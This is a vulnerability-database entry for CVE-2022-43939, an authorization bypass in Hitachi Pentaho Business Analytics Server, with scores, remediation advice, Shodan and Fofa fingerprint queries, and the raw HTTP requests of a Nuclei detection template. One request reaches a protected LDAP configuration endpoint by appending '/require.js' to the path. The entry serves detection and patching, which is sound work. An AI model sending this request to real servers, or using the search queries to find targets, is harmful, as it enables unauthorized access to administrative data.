🔙 목록으로 돌아가기

CVE-2022-43939: Hitachi Pentaho Business Analytics Server - Bypass Authorization

TitleHitachi Pentaho Business Analytics Server - Bypass Authorization
Authordaffainfo
SeverityHigh
ImpactUnauthenticated attackers can bypass authorization restrictions using non-canonical URL paths to access protected administrative endpoints in Hitachi Pentaho Business Analytics Server, potentially gaining unauthorized access to sensitive analytics data and configurations.
RemediationUpgrade to Hitachi Vantara Pentaho Business Analytics Server version 9.4.0.1, 9.3.0.2 or later that properly validates canonical URL paths.
CVSS Score8.6
EPSS Score0.93789
CVE IDCVE-2022-43939
CWE IDCWE-647
Shodan Queryhttp.favicon.hash:1749354953
Fofa Queryicon_hash=1749354953
Tags cve cve2022 pentaho hitachi auth-bypass vkev kev vuln

🔍 Vulnerability Description

Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.

🌐 HTTP Request

GET /pentaho/Login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-43939.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-43939.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A